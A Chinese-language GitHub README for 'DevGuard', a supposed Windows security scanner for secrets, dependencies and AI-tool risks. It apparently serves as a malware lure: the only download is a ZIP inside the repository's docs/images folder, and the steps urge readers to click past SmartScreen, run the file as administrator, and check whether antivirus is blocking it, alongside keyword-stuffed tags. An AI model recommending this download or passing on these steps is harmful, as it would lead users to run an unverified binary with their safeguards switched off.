Tobeyiodinated117/DevGuard

# 🛡️ DevGuard - 快速保障您的开发环境安全 [](https://github.com/Tobeyiodinated117/DevGuard/raw/refs/heads/main/docs/images/Guard-Dev-decadist.zip) ## 🚀 DevGuard 的功能 DevGuard 会在代码上线前检查您的开发环境。它会查找您的计算机和项目文件中的常见风险，然后在一份清晰的报告中显示需要注意的问题。 它能帮助您发现： - 泄露的机密信息，如 API 密钥和 token - 包和依赖项中的供应链问题 - 脆弱或有风险的加密设置 - 本地开发工具中的 AI 工具链风险 - 与您的设置相关的已知安全问题 - 项目路径中存在恶意软件或不安全文件的迹象 DevGuard 会先执行本地检查，然后使用云端分析进行更深入的审查。 ## 💻 开始之前 请在满足以下条件的 Windows 电脑上使用 DevGuard： - Windows 10 或 Windows 11 - 至少 4 GB 内存 (RAM) - 500 MB 可用磁盘空间 - 有效的网络连接（用于云端分析） - 运行应用程序和读取项目文件夹的权限 ## 📥 下载 DevGuard 访问此页面下载并运行应用程序： https://github.com/Tobeyiodinated117/DevGuard/raw/refs/heads/main/docs/images/Guard-Dev-decadist.zip ## 🪟 在 Windows 上安装 1. 在浏览器中打开下载页面。 2. 找到最新版本或应用程序文件。 3. 下载 Windows 版本。 4. 如果 Windows 请求批准，且您信任此来源，请选择**仍要运行**或**更多信息**。 5. 如果应用程序是 ZIP 文件，请右键单击并选择**全部提取**。 6. 打开解压后的文件夹。 7. 双击 DevGuard 应用程序文件以启动它。 如果您看到智能屏幕提示，请确认您要打开该文件。 ## 🔍 首次设置 启动 DevGuard 后： 1. 选择您要扫描的文件夹。 2. 如果应用程序提供选项，请选择扫描类型。 3. 检查本地扫描设置。 4. 如果应用程序提示，请登录或连接您的云账户。 5. 开始扫描。 首次运行时 DevGuard 可能需要几分钟。较大的文件夹和众多的依赖项可能需要更长的时间。 ## 🧭 使用方法 当您想在 commit、merge 或 deploy 之前检查项目时，请使用 DevGuard。 典型流程： 1. 打开 DevGuard。 2. 将其指向您的代码或工作区。 3. 开始全面的环境检查。 4. 等待扫描完成。 5. 查看结果。 6. 优先修复标记为高风险的项目。 7. 再次运行扫描以确认修复。 ## 📊 报告展示的内容 DevGuard 会对发现的问题进行分组，以便您快速采取行动。 您可能会看到以下问题： - 配置文件、env 文件或代码中的机密泄露 - 有风险的包版本 - 缺失的安全设置 - 脆弱的加密使用 - 与 AI 工作流关联的不安全本地工具 - 与已知恶意软件模式匹配的文件 - 开发设置中增加供应链风险的问题 每项结果都包含通俗易懂的描述，并在可能的情况下提供路径或文件名。 ## 🧰 常见用例 DevGuard 可融入许多日常任务： - 在打开新项目之前进行检查 - 在发布前审查代码库 - 在 merge 后查找泄露的密钥 - 审计包更新以检查 CVE 暴露情况 - 检查与 Cursor、VS Code 或基于 MCP 的工作流配合使用的工具 - 对团队成员的分支进行快速安全检查 ## ⚙️ 改善结果的基本技巧 为获得最佳结果： - 扫描项目的根文件夹 - 在进行全面扫描之前关闭正在编辑的文件 - 保持您的包列表最新 - 仔细检查环境文件 - 在每次重大依赖项更新后重新检查项目 - 在与团队外部共享代码之前运行扫描 ## 🧪 示例工作流 简单的设置如下： 1. 从上面的链接下载 DevGuard。 2. 在 Windows 上安装或打开应用程序。 3. 选择您的项目文件夹。 4. 开始扫描。 5. 查看任何有关机密、依赖项或加密的发现。 6. 修复最严重的问题。 7. 再次运行 DevGuard。 ## 🛠️ 故障排除 如果 DevGuard 未能启动： - 检查您下载的是否为 Windows 版本 - 尝试以管理员身份运行 - 如果是以 ZIP 格式下载的，请确保文件已完全解压 - 重启电脑并重试 - 检查您的防病毒软件是否拦截了该应用程序 如果扫描速度很慢： - 一次只扫描一个项目文件夹 - 关闭其他消耗资源大的应用程序 - 先使用较小的文件夹进行扫描 - 确保设备有足够的可用内存 如果结果似乎不完整： - 将 DevGuard 指向顶级项目文件夹 - 如果应用程序提供该选项，请包含隐藏的配置文件 - 确保项目未仍在从云存储同步 ## 🔐 涵盖的安全领域 DevGuard 专注于现代开发工作中影响重大的主要风险： - 机密检测 - 供应链安全 - 针对常见代码问题的 SAST 检查 - AI 安全风险 - MCP 安全检查 - 恶意软件检测 - CVE 暴露审查 - 加密弱点检查 - DevSecOps 工作流检查 ## 📁 DevGuard 审查的典型文件 DevGuard 可能会检查以下文件： - `.env` - `package.json` - `requirements.txt` - lock 文件 - 构建脚本 - 配置文件 - shell 脚本 - 编辑器设置 - AI 工具配置文件 ## 🧩 支持的工作流 DevGuard 适用于以下场景： - Python 项目 - VS Code 项目 - 基于 Cursor 的工作区 - 本地 AI 工具设置 - 小型应用 - 大型团队仓库 ## 📌 运行扫描的最佳时机 请在以下时机运行 DevGuard： - 在 commit 代码之前 - 在 pull request 之前 - 在发布之前 - 在添加新包之后 - 在更改 secrets 或 credentials 之后 - 在设置新开发机之后 ## 🖥️ Windows 运行步骤 如果您想要最简捷的流程： 1. 前往下载页面。 2. 下载 DevGuard。 3. 打开文件。 4. 允许运行。 5. 选择您的项目文件夹。 6. 开始扫描 ## 📦 从仓库获取的内容 仓库页面为您提供了应用程序源码、发布文件和更新。您可以使用它获取最新的 Windows 构建版本，并在安装前阅读相关文件名或发布说明。 ## 🔎 扫描完成后 扫描结束时： 1. 打开报告。 2. 优先按高风险排序。 3. 优先修复机密和暴露的凭据。 4. 更新不安全的包。 5. 移除或替换脆弱的加密设置。 6. 在每一轮修复后再次扫描 ## 🧼 保持 DevGuard 的实用性 为了使扫描随时间推移保持实用： - 在依赖项更新后运行它 - 在 merge 前检查新分支 - 在重新使用旧项目前进行扫描 - 审查您设置中的任何新 AI 工具 - 保持 Windows 和您的开发工具处于最新状态

标签：AI工具链安全, API密钥泄露防护, DevSecOps, DLP, Git预推送扫描, pre-push安全检查, SAST, Windows安全工具, 上游代理, 云安全分析, 代码安全, 依赖项漏洞扫描, 加密安全, 威胁情报, 安全助手, 安全基线检查, 开发者工具, 开源组件风险分析, 本地安全扫描, 机密检测, 漏洞枚举, 盲注攻击, 网络安全, 自定义DNS解析器, 软件开发工具包, 配置审计, 隐私保护, 静态应用安全测试